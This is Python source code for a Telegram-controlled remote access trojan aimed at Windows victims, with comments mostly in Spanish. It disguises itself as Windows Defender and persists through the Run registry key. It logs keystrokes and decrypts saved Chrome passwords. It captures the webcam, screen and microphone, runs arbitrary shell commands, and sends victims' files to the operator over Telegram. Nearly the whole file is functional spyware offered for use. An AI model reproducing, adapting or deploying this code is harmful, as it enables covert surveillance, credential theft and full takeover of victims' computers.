Listener\nimport shutil\nimport win32clipboard # register clipboard\nimport sqlite3 # get chrome passwords\nimport win32crypt # get chrome passwords\nimport base64 # /encrypt_all\nimport datetime # /schedule\nimport time\nimport threading # /proxy, /schedule\nimport proxy\nimport pyaudio, wave # /hear\nimport telepot, requests # telepot => telegram, requests => file download\nfrom telepot.namedtuple import InlineKeyboardMarkup, InlineKeyboardButton\nimport pythoncom, pyHook # keylogger\nimport socket # internal IP\nimport getpass # get username\nimport collections\nimport urllib # wallpaper\nimport cv2 # webcam\nimport yagmail\nfrom datetime import datetime \nfrom ctypes import * # fixing pyinstaller - we need to import all the ctypes to get api-ms-win-crt-*, you will also need https://www.microsoft.com/en-US/download/details.aspx?id=48145\n\ntry: # Crea dirección\n os.makedirs('C:\\\\Users\\\\Public\\\\Security\\\\Windows Defender')\nexcept:\n pass\nnameKey = \"WindowsDefenderAdvanced.exe\"\nfilePath = \"C:\\\\Users\\\\Public\\\\Security\\\\Windows Defender\\\\\"+ nameKey\ntry:\n with open(filePath, 'r') as f: # Verifica si el keylogger se encuentra oculto en el sistema\n print(\"El keylogger ya se encuentra en la carpeta oculta\")\nexcept :\n print(\"El Keylogger no se encuentra en el sistema, y tratará de copiarlo\")\n try:\n shutil.copy(nameKey , filePath) # Intenta ocultar el 
keylogger en una carpeta\n print(\"El keylogger se escondió exitosamente en el sistema\")\n except:\n print(\"No se puedo esconder el Keylogger en el sistema\")\ntry: # Intenta crear la dirección\n os.makedirs('logs')\nexcept:\n pass\n \ncd.log('i','Starting')\nme = singleton.SingleInstance()\n\ntoken = 'xx:xx' # <== Aquí debes ingresar el codigo único de tu Bot\nif 'RVT_TOKEN' in os.environ: # it can also be set as an environment variable\n token = os.environ['RVT_TOKEN']\n \napp_name = 'Microsoft' # Nombre de la carpeta en dentro delRoaming\nknown_ids = [''] # Ejemplo => 991466973 <= Ejemplo # AGREGUE SU chat_id EN FORMATO DE CADENA A LA LISTA A CONTINUACIÓN SI DESEA QUE SU BOTELO SOLO RESPONDA A UNA PERSONA\nappdata_roaming_folder = os.environ['APPDATA']\nhide_folder = appdata_roaming_folder + '\\\\' + app_name #Carpeta escondite\ncompiled_name = app_name + '.exe' # ruta donde se compilará\ntarget_shortcut = startup() + '\\\\' + compiled_name.replace('.exe', '.lnk')\nif not os.path.exists(hide_folder):\n\tos.makedirs(hide_folder)\n\thide_compiled = hide_folder + '\\\\' + compiled_name\n\tcopyfile(argv[0], hide_compiled)\n\tshell = Dispatch('WScript.Shell')\n\tshortcut = shell.CreateShortCut(target_shortcut)\n\tshortcut.Targetpath = hide_compiled\n\tshortcut.WorkingDirectory = hide_folder\n\tshortcut.save()\nif not os.path.exists('logs/{}-log.txt'.format(str(datetime.now().strftime('%Y-%m-%d')))):\n f=open('logs/{}-log.txt'.format(str(datetime.now().strftime('%Y-%m-%d'))))\n f.close()\ndestroy = False\nuser = os.environ.get(\"USERNAME\")\t# Windows username to append keylogs\nschedule = {}\nlog_file = hide_folder + '\\\\.user'\nkeylogs_file = hide_folder + '\\\\.keylogs'\nwith open(log_file, \"a\") as writing:\n\twriting.write(\"-------------------------------------------------\\n\")\n\twriting.write(user + \" Log: \" + strftime(\"%b %d@%H:%M\") + \"\\n\\n\")\nlogging.basicConfig(filename=log_file,level=logging.DEBUG)\n\ndef runStackedSchedule(everyNSeconds): #Ejecuta en un horario predeterminado\n for k in schedule.keys():\n if k < datetime.datetime.now():\n handle(schedule[k])\n del schedule[k]\n threading.Timer(everyNSeconds, runStackedSchedule).start()\ndef internalIP():\n internal_ip = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n internal_ip.connect(('google.com', 0))\n return internal_ip.getsockname()[0]\ndef checkchat_id(chat_id):\n return len(known_ids) == 0 or str(chat_id) in known_ids\ndef split_string(n, st):\n lst = ['']\n for i in str(st):\n l = len(lst) - 1\n if len(lst[l]) < n:\n lst[l] += i\n else:\n lst += [i]\n return lst\n\ndef send_safe_message(bot, chat_id, message):\n while(True):\n try:\n cd.log('n', 'Message sent:\\n{}'.format(\n bot.sendMessage(chat_id, message)), True)\n break\n except:\n pass\ndef handle(msg):\n chat_id = msg['chat']['id']\n if checkchat_id(chat_id):\n response = ''\n if 'text' in msg:\n cd.log('n', '\\n\\t\\tAdministrador con ID: ' + str(chat_id) + '\\n\\n Uso el comando:\\t\\t' + msg['text'] + '\\n\\n', True)\n command = msg['text']\n try:\n if command == '/redInfo': # Información de la RED\n response = ''\n bot.sendChatAction(chat_id, 'typing')\n lines = os.popen('arp -a -N ' + internalIP())\n for line in lines:\n line.replace('\\n\\n', '\\n')\n response += line \n elif command == '/webcam': # Captura de Web Cam \n bot.sendChatAction(chat_id, 'typing')\n camera = cv2.VideoCapture(0)\n while True:\n return_value, image = camera.read()\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n cv2.imshow('image', gray)\n if cv2.waitKey(1) & 0xFF 
== ord('s'):\n cv2.imwrite('webcam.jpg', image)\n break\n camera.release()\n cv2.destroyAllWindows()\n bot.sendChatAction(chat_id, 'upload_photo')\n bot.sendDocument(chat_id, open('webcam.jpg', 'rb'))\n os.remove('webcam.jpg')\n elif command == '/captura': # Captura de pantalla\n bot.sendChatAction(chat_id, 'typing') \n screenshot = ImageGrab.grab()\n screenshot.save('screenshot.jpg')\n bot.sendChatAction(chat_id, 'upload_photo')\n bot.sendDocument(chat_id, open('screenshot.jpg', 'rb'))\n os.remove('screenshot.jpg')\n elif command.startswith('/cmd'): # CMD \n try:\n cd.log('w', 'Command exec prep')\n process = Popen(['cmd'], stdin=PIPE, stdout=PIPE)\n command = command.replace('/cmd', '')\n cd.log('w', 'Executing the command '+command)\n if len(command) > 1:\n process.stdin.write(bytes(command + '\\n'))\n process.stdin.close()\n lines = process.stdout.readlines()\n for l in lines:\n response += l\n else:\n response = '/cmd dir'\n except:\n response = 'Vuelve a escribir '\n elif command.startswith('/ir'): # Navegar entre carpetas\n command = command.replace('/ir ', '')\n try:\n os.chdir(command)\n response = os.getcwd() + '>'\n except:\n response = 'No subfolder matching ' + command\n elif command == '/cmd_dns': # Informacion DNS\n bot.sendChatAction(chat_id, 'typing')\n lines = os.popen('ipconfig /displaydns')\n for line in lines:\n line.replace('\\n\\n', '\\n')\n response += line\n elif command == '/cmd_ipconfig': # Informacion IPConfig\n bot.sendChatAction(chat_id, 'typing')\n lines = os.popen('ipconfig /all')\n for line in lines:\n line.replace('\\n\\n', '\\n')\n response += line\n elif command.startswith('/descargar'): # Descargar un archivo\n bot.sendChatAction(chat_id, 'typing')\n path_file = command.replace('/descargar', '')\n path_file = path_file[1:]\n if path_file == '':\n response = '/descargar C:/path/to/file.name or /descargarfile.name'\n else:\n bot.sendChatAction(chat_id, 'upload_document')\n try:\n bot.sendDocument(chat_id, open(path_file, 'rb'))\n except:\n try:\n bot.sendDocument(chat_id, open(\n hide_folder + '\\\\' + path_file))\n response = 'Found in hide_folder: ' + hide_folder\n except:\n response = 'Could not find ' + path_file\n elif command.startswith('/copiar'): # Copia archivos\n command = command.replace('/copiar', '')\n command = command.strip()\n if len(command) > 0:\n try:\n file1 = command.split('\"')[1]\n file2 = command.split('\"')[3]\n copyfile(file1, file2)\n response = 'Archivos copiados exitosamente.'\n except Exception as e:\n response = 'Error: \\n' + str(e)\n else:\n response = 'Usage: \\n/copiar \"C:/Users/DonaldTrump/Desktop/porn.jpg\" \"C:/Users/DonaldTrump/AppData/Roaming/Microsoft Windows/[pornography.jpg]\"'\n response += '\\n\\nDouble-Quotes are needed in both whitespace-containing and not containing path(s)'\n elif command.endswith('block_key'): # Bloquear teclado\n response = 'Ésta funcionalidad, está en proceso'\n elif command.endswith('block_mouse'): # Bloquear Mouse\n response = 'Ésta funcionalidad, está en proceso'\n elif command.endswith('desblock_mouse'): # Desbloquear Mouse\n response = 'Ésta funcionalidad, está en proceso'\n elif command.endswith('desblock_mouse'):\n response = 'Ésta funcionalidad, está en proceso' \n elif command == '/get_chrome': # Obtiene contraseñas de Chrome\n con = sqlite3.connect(os.path.expanduser(\n '~') + r'\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data')\n cursor = con.cursor()\n cursor.execute(\n \"SELECT origin_url,username_value,password_value from logins;\")\n for users in 
cursor.fetchall():\n response += 'Website: ' + users[0] + '\\n'\n response += 'Username: ' + users[1] + '\\n'\n response += 'Password: ' + \\\n str(win32crypt.CryptUnprotectData(\n users[2], None, None, None, 0)) + '\\n\\n'\n elif command == '/get_wifi': \n pass\n elif command == '/get_key':\n try:\n bot.sendChatAction(chat_id, 'upload_document')\n bot.sendDocument(chat_id, open(keylogs_file, \"rb\"))\n except:\n response = 'No se pudo obtener el registro de Teclas.'\n pass\n elif command == '/get_desktop':\n try:\n r= \"C:\\\\Users\\\\\"+str(getuser())+\"\\\\Desktop\\\\\"\n os.chdir(r)\n response = os.getcwd() + '>'\n except:\n response = \"Hubo un error al acceder a la ruta\" \n \n elif command == '/get_documents':\n \"\"\"\n r= \"C:\\\\Users\\\\\"+str(getuser())+\"\\\\Documents\\\\\"\n os.chdir(r)\n response = os.getcwd() + '>'\n \n try:\n r= \"O:\\\\OneDrive - xKx\\\\SoftwareProyectGit\\\\RAT-via-Telegram\\\\tests\\\\\"\n # F:\\esto\\file1.txt\n #bot.sendChatAction(chat_id, 'typing')\n files = []\n files = os.listdir(r)\n human_readable = ''\n for file in files:\n human_readable += file + '\\n'\n #bot.sendDocument(chat_id, open(file, \"rb\"))\n #bot.sendDocument(chat_id, open( hide_folder + '\\\\' + path_file))\n try:\n bot.sendChatAction(chat_id, 'upload_document')\n bot.sendDocument(chat_id, open(\"\\\\\"+file))\n response += \"se envió\"+file\n except:\n response += \"no se envió el archivo: \"+file\n \n response += human_readable\n except:\n response = ' Hubo un error, vuelva a intentarlo denuevo'\n \"\"\"\n pass \n elif command == '/get_download':\n r= \"C:\\\\Users\\\\\"+str(getuser())+\"\\\\Downloads\\\\\"\n os.chdir(r)\n response = os.getcwd() + '>'\n elif command == '/get_videos':\n r= \"C:\\\\Users\\\\\"+str(getuser())+\"\\\\Videos\\\\\"\n os.chdir(r)\n response = os.getcwd() + '>'\n \n elif command == '/get_music':\n r= \"C:\\\\Users\\\\\"+str(getuser())+\"\\\\Music\\\\\"\n os.chdir(r)\n response = os.getcwd() + '>'\n \n elif command == '/get_pictures':\n r= \"C:\\\\Users\\\\\"+str(getuser())+\"\\\\Pictures\\\\\"\n os.chdir(r)\n response = os.getcwd() + '>'\n elif command == '/eliminar_key':\n command = command.replace('/eliminar_key', '')\n path_file = command.strip()\n try:\n os.remove(\"C:\\\\Users\\\\\"+str(getuser())+\"\\\\AppData\\\\Roaming\\\\Microsoft\\\\.keylogs\")\n response = 'El archivo \".keylogs\" se eliminó correctamente' \n except:\n response = 'No se pudo eliminar el archivo \".keylogs\" '\n elif command.startswith('/eliminar'): # Elimina carpeta o archivo\n command = command.replace('/eliminar', '')\n path_file = command.strip()\n try:\n os.remove(path_file)\n response = 'El archivo se eliminó correctamente'\n except:\n try:\n os.rmdir(path_file)\n response = 'La carpeta se eliminó correctamente'\n except:\n try:\n shutil.rmtree(path_file)\n response = 'Succesfully removed folder and it\\'s files'\n except:\n response = 'El archivo no existe'\n elif command.startswith('/audio'): # Graba Audio\n try:\n SECONDS = -1\n try:\n SECONDS = int(command.replace('/hear', '').strip())\n except:\n SECONDS = 5\n\n CHANNELS = 2\n CHUNK = 1024\n FORMAT = pyaudio.paInt16\n RATE = 44100\n\n audio = pyaudio.PyAudio()\n bot.sendChatAction(chat_id, 'typing')\n stream = audio.open(format=FORMAT, channels=CHANNELS,\n rate=RATE, input=True,\n frames_per_buffer=CHUNK)\n frames = []\n for i in range(0, int(RATE / CHUNK * SECONDS)):\n data = stream.read(CHUNK)\n frames.append(data)\n stream.stop_stream()\n stream.close()\n audio.terminate()\n\n wav_path = hide_folder + 
'\\\\mouthlogs.wav'\n waveFile = wave.open(wav_path, 'wb')\n waveFile.setnchannels(CHANNELS)\n waveFile.setsampwidth(audio.get_sample_size(FORMAT))\n waveFile.setframerate(RATE)\n waveFile.writeframes(b''.join(frames))\n waveFile.close()\n bot.sendChatAction(chat_id, 'upload_document')\n except OSError:\n cd.log(\n 'e', 'Unable to listen in - there is probably no input device.')\n response = 'unable to listen in - there is probably no input device'\n elif command == '/ip_info': # Información del IP\n try:\n bot.sendChatAction(chat_id, 'find_location')\n info = requests.get('http://ipinfo.io').text # json format\n location = (loads(info)['loc']).split(',')\n bot.sendLocation(chat_id, location[0], location[1])\n import string\n import re\n response = 'External IP: '\n response += \"\".join(\n filter(lambda char: char in string.printable, info))\n response = re.sub('[:,{}\\t\\\"]', '', response)\n response += '\\n' + 'Internal IP: ' + '\\n\\t' + internalIP()\n except:\n response = 'Hubo un error'\n elif command.startswith('/listar'): # Muestra lista de archivos y carpetas\n try:\n bot.sendChatAction(chat_id, 'typing')\n command = command.replace('/listar', '')\n command = command.strip()\n files = []\n if len(command) > 0:\n files = os.listdir(command)\n else:\n files = os.listdir(os.getcwd())\n human_readable = ''\n for file in files:\n human_readable += file + '\\n'\n response = human_readable\n except:\n response = ' Hubo un error, vuelva a intentarlo denuevo'\n elif command.startswith('/mensaje'): # Muestra un mensaje \n message = command.replace('/mensaje', '')\n if message == '':\n response = '/mensaje '\n else:\n ctypes.windll.user32.MessageBoxW(\n 0, message, u'Information', 0x40)\n response = 'MsgBox displayed'\n elif command.startswith('/mover'): # Mueve archivos \n command = command.replace('/mover', '')\n if len(command) > 0:\n try:\n file1 = command.split('\"')[1]\n file2 = command.split('\"')[3]\n move(file1, file2)\n response = 'El archivo se movió exitosamente.'\n except Exception as e:\n response = 'Error: \\n' + str(e)\n else:\n response = 'Usage: \\n/mv \"C:/Users/DonaldTrump/Desktop/porn.jpg\" \"C:/Users/DonaldTrump/AppData/Roaming/Microsoft Windows/[pornography.jpg]\"'\n response += '\\n\\nDouble-Quotes are needed in both whitespace-containing and not containing path(s)'\n elif command == '/pc_info': # Información de la Computadora\n bot.sendChatAction(chat_id, 'typing')\n info = ''\n for pc_info in platform.uname():\n info += '\\n' + pc_info\n info += '\\n' + 'Username: ' + getpass.getuser()\n response = info\n elif command == '/test': # Verifica conexión\n response = platform.uname()[1] + ': I\\'Se encuentra en linea!!'\n elif command.startswith('/web'): # Abre el navegador con una URL \n command = command.replace('/web', '')\n command = command.strip()\n if len(command) > 0:\n systemCommand = 'start \\\"\\\" \\\"'\n systemCommand += command\n systemCommand += '\\\"'\n if os.system(systemCommand) == 0:\n response = 'La pagina web se abrió con exito'\n else:\n response = 'Hubo un error al abrir la pagina web'\n else:\n response = '/web URL'\n elif command == '/proxy': # Abre puertos\n threading.Thread(target=proxy.main).start()\n info = requests.get('http://ipinfo.io').text # json format\n ip = (loads(info)['ip'])\n response = 'Proxy succesfully setup on ' + ip + ':8081'\n elif command == '/this': # Carpeta donde se encuentra RAT\n response = os.getcwd()\n elif command.startswith('/python_exec'):\n command = command.replace('/python_exec', '').strip()\n if len(command) 
== 0:\n response = 'Usage: /python_exec print(\\'printing\\')'\n else:\n cd.log('w', 'Executing python command')\n if response == '':\n response = 'Expression executed. No return or malformed expression.'\n elif command == '/reiniciar': # Reiniciará\n bot.sendChatAction(chat_id, 'typing')\n command = os.popen('shutdown /r /f /t 0')\n response = 'Computer will be restarted NOW.'\n elif command.startswith('/ejecutar'): # Ejecuta un archivo\n bot.sendChatAction(chat_id, 'typing')\n path_file = command.replace('/ejecutar', '')\n path_file = path_file[1:]\n if path_file == '':\n response = '/run_file C:/path/to/file'\n else:\n try:\n os.startfile(path_file)\n response = 'El archivo\\n\\n' + path_file + '\\n\\n Se ejecutó correctamente.'\n except:\n try:\n os.startfile(hide_folder + '\\\\' + path_file)\n response = 'El archivo:\\n ' + path_file + '\\n\\n Se ejecutó en hide_folder'\n except:\n response = 'No se encuentra el archivo'\n elif command.startswith('/calendario'): # Cambia la fecha del calendarios\n command = command.replace('/calendario', '')\n if command == '':\n response = '/calendario 2017 12 24 23 59 /msg_box happy christmas'\n else:\n scheduleDateTimeStr = command[1:command.index('/') - 1]\n scheduleDateTime = datetime.datetime.strptime(\n scheduleDateTimeStr, '%Y %m %d %H %M')\n scheduleMessage = command[command.index('/'):]\n schedule[scheduleDateTime] = {\n 'text': scheduleMessage, 'chat': {'id': chat_id}}\n response = 'Schedule set: ' + scheduleMessage\n runStackedSchedule(10)\n elif command == '/auto_destruye': # Auto destruye Rat\n bot.sendChatAction(chat_id, 'typing')\n global destroy\n destroy = True\n response = 'You sure? Type \\'/destroy\\' to proceed.'\n elif command == '/apagar': # Apaga la computadora\n bot.sendChatAction(chat_id, 'typing')\n command = os.popen('apagar /s /f /t 0')\n response = 'La computadora se apagará AHORA.'\n elif command == '/destruir' and destroy == True: # Destruye el RAT\n bot.sendChatAction(chat_id, 'typing')\n if os.path.exists(hide_folder):\n rmtree(hide_folder)\n if os.path.isfile(target_shortcut):\n os.remove(target_shortcut)\n os._exit(0)\n elif command == '/tareas': # Ver lista de tareas\n lines = os.popen('tasklist /FI \\\"STATUS ne NOT RESPONDING\\\"')\n response2 = ''\n for line in lines:\n line.replace('\\n\\n', '\\n')\n if len(line) > 2000:\n response2 += line\n else:\n response += line\n response += '\\n' + response2\n elif command.startswith('/enviar'): # Envia archivo de PC Maestro a PC victima\n command = command.replace('/enviar', '') \n import winsound\n winsound.Beep(440, 300)\n if command == '':\n response = '/enviar , /msg_box Hello HOME-PC and WORK-PC'\n else:\n targets = command[:command.index('/')]\n if platform.uname()[1] in targets:\n command = command.replace(targets, '')\n msg = {'text': command, 'chat': {'id': chat_id}}\n handle(msg) \n elif command == '/actualizar': # Actualiza F5 RAT\n proc_name = app_name + '.exe'\n if not os.path.exists(hide_folder + '\\\\updated.exe'):\n response = 'Send updated.exe first.'\n else:\n for proc in psutil.process_iter():\n # check whether the process name matches\n if proc.name() == proc_name:\n proc.kill()\n os.rename(hide_folder + '\\\\' + proc_name,\n hide_folder + '\\\\' + proc_name + '.bak')\n os.rename(hide_folder + '\\\\updated.exe',\n hide_folder + '\\\\' + proc_name)\n os.system(hide_folder + '\\\\' + proc_name)\n sys.exit()\n elif command.startswith('/fondo'): # Cambiar de fondo de pantalla\n command = command.replace('/fondo', '')\n command = command.strip()\n if 
len(command) == 0:\n response = 'Usage: /fondo C:/Users/User/Desktop/porn.jpg'\n elif command.startswith('http'):\n image = command.rsplit('/', 1)[1]\n image = hide_folder + '/' + image\n urllib.urlretrieve(command, image)\n ctypes.windll.user32.SystemParametersInfoW(\n 20, 0, image, 3)\n else:\n ctypes.windll.user32.SystemParametersInfoW(\n 20, 0, command.replace('/', '//'), 3)\n response = 'Se cambió el fondo de pantalla.' \n elif command == '/help':\n # functionalities dictionary: command:arguments\n functionalities = {'/red_info': ' => Información de la Red',\\\n '/webcam': ' => Toma foto a la WebCam',\\\n '/captura': ' => ',\\\n #'/cmd': ' => Ejecuta desde Consola ',\\\n '/ir': ' => Navega entre carpetas',\\\n '/eliminar': ' => Elimina archivo o carpeta',\\\n '/eliminar_key':' => Elimina el archivo Keylogger',\\\n '/cmd_dns': ' => Muestra información DNS',\\\n #'/cmd_ipconfig':' => Muestra información IP Config',\\\n '/descargar': ' => Descarga un archivo',\\\n '/copiar': ' => Copiar archivos, de la misma PC',\\\n '/mover': ' => Mueve archivos',\\\n #'/block_key': ' => Bloquea el Teclado',\\\n #'/block_mouse': ' => Bloquea el movimiento del Mouse',\\\n #'/desblock_mouse': ' => Desbloquear movimiento del mouse',\\\n '/get_chrome': ' => Obtener contraseñas de chrome',\\\n #'/get_wifi': ' => Obtener contraseñas de Wifi',\\\n '/get_key':' => Obtiene el registro de teclas',\\\n #'/get_documents':' => Obtiene Documentos del Usuario',\\\n #'/get_music':' => Obtiene Musica del Usuario',\\\n #'/get_videos':' => Obtiene Videos del Usuario',\\\n #'/get_pictures':' => Obtiene Photos del Usuario',\\\n #'/get_download':' => Obtiene Descargas del Usuario',\\\n #'/get_desktop':' => Obtiene Escritorio del Usuario',\\\n '/audio': ' => [tiempo en segundos, default=5s]',\\\n '/ip_info': ' => Obtener información de IP',\\\n '/test': ' => Verifica si la victima está en linea',\\\n '/web': ' => Abre en el navegador un LINK',\\\n '/proxy': ' => Abre un proxy',\\\n '/this': ' => Muestra directorio actual RAT',\\\n '/listar': ' => Muestra directorio actual RAT',\\\n '/reiniciar': ' => Reinicia la computadora',\\\n '/ejecutar': ' => Ejecuta un archivo *EXE',\\\n #'/calendario': ' => Modifica el calendario',\\\n #'/auto_destruye': ' => Se destruye RAT',\\\n '/apagar': ' => Apaga la computadora',\\\n #'/destruir': ' => Destruye el RAT',\\\n '/tareas': ' => Lista de Tareas',\\\n '/enviar': ' => Envia Archivos a la PC de la victima',\\\n #'/actualizar': ' => Actualiza la carpeta',\\\n '/fondo': ' => Cambia de fondo de pantalla'}\n response = \"\\n\".join(command + ' ' + description for command, description in sorted(functionalities.items()))\n else: # redirect to /help\n cd.log('w', 'BOT MISUSE: Invalid command')\n msg = {'text': '/help', 'chat': {'id': chat_id}}\n handle(msg)\n except Exception as e:\n cd.log('e', 'BOT MISUSE: Unknown error running command or function.')\n cd.log('z', 'Details from previous error'+str(e))\n cd.log('n', 'Command {} ran'.format(command))\n else: # Upload a file to target\n file_name = ''\n file_id = None\n if 'document' in msg:\n file_name = msg['document']['file_name']\n file_id = msg['document']['file_id']\n elif 'photo' in msg:\n file_time = int(time.time())\n file_id = msg['photo'][1]['file_id']\n file_name = file_id + '.jpg'\n file_path = bot.getFile(file_id=file_id)['file_path']\n link = 'https://api.telegram.org/file/bot' + \\\n str(token) + '/' + file_path\n file = (requests.get(link, stream=True)).raw\n with open(hide_folder + '\\\\' + file_name, 'wb') as out_file:\n 
copyfileobj(file, out_file)\n response = 'Archivo guardado como: ' + file_name\n if response != '':\n responses = split_string(4096, response)\n for resp in responses:\n send_safe_message(bot, chat_id, resp)\n\ndef KeyConMin(argument): # Caracteres Comunes // Optimizados\n switcher = {\n # Vocales Miniscula\n \"'a'\": \"a\",\n \"'e'\": \"e\",\n \"'i'\": \"i\",\n \"'o'\": \"o\",\n \"'u'\": \"u\",\n # Letras Minusculas\n \"'b'\": \"b\",\n \"'c'\": \"c\",\n \"'d'\": \"d\",\n \"'f'\": \"f\",\n \"'g'\": \"g\",\n \"'h'\": \"h\",\n \"'j'\": \"j\",\n \"'J'\": \"J\",\n \"'k'\": \"k\",\n \"'l'\": \"l\",\n \"'m'\": \"m\",\n \"'n'\": \"n\",\n \"'ñ'\": \"ñ\",\n \"'p'\": \"p\",\n \"'q'\": \"q\",\n \"'r'\": \"r\",\n \"'s'\": \"s\",\n \"'t'\": \"t\",\n \"'v'\": \"v\",\n \"'w'\": \"w\",\n \"'x'\": \"x\",\n \"'y'\": \"y\",\n \"'z'\": \"z\",\n # Caracteres\n \"','\": \",\", # ,\n \"'.'\": \".\", # .\n \"'_'\": \"_\", # _\n \"'-'\": \"-\", # -\n \"':'\": \":\", #\n # Vocales Mayúsculas\n \"'A'\": \"A\",\n \"'E'\": \"E\",\n \"'I'\": \"I\",\n \"'O'\": \"O\",\n \"'U'\": \"U\",\n # Letras Mayúsculas\n \"'B'\": \"B\",\n \"'C'\": \"C\",\n \"'D'\": \"D\",\n \"'F'\": \"F\",\n \"'G'\": \"G\",\n \"'H'\": \"H\",\n \"'K'\": \"K\",\n \"'L'\": \"L\",\n \"'M'\": \"M\",\n \"'N'\": \"N\",\n \"'Ñ'\": \"Ñ\",\n \"'P'\": \"P\",\n \"'Q'\": \"Q\",\n \"'R'\": \"R\",\n \"'S'\": \"S\",\n \"'T'\": \"T\",\n \"'V'\": \"V\",\n \"'W'\": \"W\",\n \"'X'\": \"X\",\n \"'Y'\": \"Y\",\n \"'Z'\": \"Z\",\n # Números Standard\n \"'1'\": \"1\",\n \"'2'\": \"2\",\n \"'3'\": \"3\",\n \"'4'\": \"4\",\n \"'5'\": \"5\",\n \"'6'\": \"6\",\n \"'7'\": \"7\",\n \"'8'\": \"8\",\n \"'9'\": \"9\",\n \"'0'\": \"0\",\n # Caracteres Especiales\n \"'@'\": \"@\", # @\n \"'#'\": \"#\", # #\n \"'*'\": \"*\", #\n \"'('\": \"(\", # (\n \"')'\": \")\", # )\n \"'?'\": \"?\", # ?\n \"'='\": \"=\", # =\n \"'+'\": \"+\", # +\n \"'!'\": \"!\", # !\n \"'}'\": \"}\", # }\n \"'{'\": \"{\", # {}\n \"'´'\": \"´\", # ´\n \"'|'\": \"|\", # |\n \"'°'\": \"°\", # °\n \"'^'\": \"¬\", # ^\n \"';'\": \";\", #\n \"'$'\": \"$\", # $\n \"'%'\": \"%\", # %\n \"'&'\": \"&\", # &\n \"'>'\": \">\", #\n \"'<'\": \"<\", # \n \"'/'\": \"/\", # /\n \"'¿'\": \"¿\", # ¿\n \"'¡'\": \"¡\", # ¡\n \"'~'\": \"~\" #\n }\n return switcher.get(argument, \"\")\ndef KeyConMax(argument): # Botones, comunes // Optimizados\n switcher = {\n \"Key.space\": \" \", # Espacio\n \"Key.backspace\": \"«\", # Borrar\n \"Key.enter\": \"\\r\\n\", # Salto de linea\n \"Key.tab\": \" \", # Tabulación\n \"Key.delete\":\" «×» \", # Suprimir\n # Números\n \"<96>\": \"0\", # 0\n \"<97>\": \"1\", # 1\n \"<98>\": \"2\", # 2\n \"<99>\": \"3\", # 3\n \"<100>\": \"4\", # 4\n \"<101>\": \"5\", # 5\n \"<102>\": \"6\", # 6\n \"<103>\": \"7\", # 7\n \"<104>\": \"8\", # 8\n \"<105>\": \"9\", # 9\n # Números Númeral\n \"None<96>\": \"0\", # 0\n \"None<97>\": \"1\", # 1\n \"None<98>\": \"2\", # 2\n \"None<99>\": \"3\", # 3\n \"None<100>\": \"4\", # 4\n \"None<101>\": \"5\", # 5\n \"None<102>\": \"6\", # 6\n \"None<103>\": \"7\", # 7\n \"None<104>\": \"8\", # 8\n \"None<105>\": \"9\", # 9\n # Teclas raras 2 \n \"['^']\": \"^\",\n \"['`']\": \"`\", #\n \"['¨']\": \"¨\", #\n \"['´']\": \"´\", #\n \"<110>\": \".\", #\n \"None<110>\": \".\", #\n \"Key.alt_l\": \" [Alt L] \", #\n \"Key.alt_r\": \" [Alt R] \",\n #\"Key.shift_r\": \" [Shift R] \",\n #\"Key.shift\": \" [Shift L] \",\n \"Key.ctrl_r\": \" [Ctrl R] \", #\n \"Key.ctrl_l\": \" [Ctrl L] \", #\n \"Key.right\" : \" [Right] \", #\n \"Key.left\" : \" [Left] \", #\n \"Key.up\" : \" [Up]\", #\n 
\"Key.down\" : \" [Down] \", #\n #\"'\\x16'\" : \" [Pegó] \",\n #\"'\\x18'\" : \" [Cortar] \", \n #\"'\\x03'\" : \" [Copiar] \", \n \"Key.caps_lock\" : \" [Mayus lock] \", \n #\"Key.media_previous\" : \" ♫ \", #\n #\"Key.media_next\" : \" ♫→ \", #\n #\"Key.media_play_pause\" : \" ■ ♫ ■ \",#\n \"Key.cmd\" : \" [Win] \" #\n }\n return switcher.get(argument, \"\")\ndef Klogger(): # Obtiene registro de teclas y guarda en un archivo .keylogs\n try: # Intenta crear el archivo\n log = os.environ.get(\n 'pylogger_file',\n os.path.expanduser('C:\\\\Users\\\\'+str(getuser())+'\\\\AppData\\\\Roaming\\\\Microsoft\\\\.keylogs')\n )\n T = datetime.datetime.now()\n getTime = \"Fecha: [\"+ T.strftime(\"%A\") + \" \" + T.strftime(\"%d\") + \" de \" + T.strftime(\"%B\") + \"]\\nHora: [\" + T.strftime(\"%I\")+ \":\"+ T.strftime(\"%M\")+ \" \"+ T.strftime(\"%p\")+ \" con \" + T.strftime(\"%S\") +\" Segundos]\\n\"\n with open (log, \"a\") as f:\n f.write(\"\\n--------------------------------------------\\nUserName: [\"+str(getuser()) +\"]\\n\"+ str(getTime)+\"--------------------------------------------\\n\\n\")\n except: # Si no puede crear el archivo, crea el directorio faltante\n pass\n def on_press(key):\n w = \"\"\n with open(log, \"a\") as f:\n if (len(str(key))) <= 3:\n print(KeyConMin(str(key)))\n \n f.write(KeyConMin(str(key)))\n else:\n print(KeyConMax(str(key)))\n f.write(KeyConMax(str(key)))\n with Listener(on_press=on_press) as listener: # Escucha pulsaciones de teclas\n listener.join() \n\n\n\n# HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n# HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n\n\n\ndef addStartup(): # function = Iniciar automaticamente\n path = r\"C:\\Users\\Public\\Security\\Windows Defender\\WindowsDefenderAdvanced.exe\" # Path del Software completo\n name = \"Windows Defender\" # Nombre del StartUp\n keyVal = r'Software\\Microsoft\\Windows\\CurrentVersion\\Run' # Path del registro\n def verificar():\n try: # Intenta crear la dirección\n os.makedirs('C:\\\\Users\\\\Public\\\\Security\\\\Microsoft')\n return True # Se creó la carpeta\n except:\n return False# La carpeta ya existe\n try: # Solo si tiene permisos de administrador\n registry = OpenKey(HKEY_LOCAL_MACHINE, keyVal, 0, KEY_ALL_ACCESS) # machine\n SetValueEx(registry,name, 0, REG_SZ, path)\n verificar() # Crea Carpeta\n except: # Si no tien permisos de administrador\n if (verificar()):\n registry = OpenKey(HKEY_CURRENT_USER, keyVal, 0, KEY_ALL_ACCESS) # local\n SetValueEx(registry,name, 0, REG_SZ, path)\n \n \n \n \ncd.log('s', 'Configuración Terminada')\ncd.log('i', 'Iniciando')\naddStartup() \nbot = telepot.Bot(token)\nbot.message_loop(handle)\nif len(known_ids) > 0:\n helloWorld = platform.uname()[1] + \": ==>> Está en linea...\"\n for known_id in known_ids:\n send_safe_message(bot, known_id, helloWorld)\n print(helloWorld)\ncd.log('s', 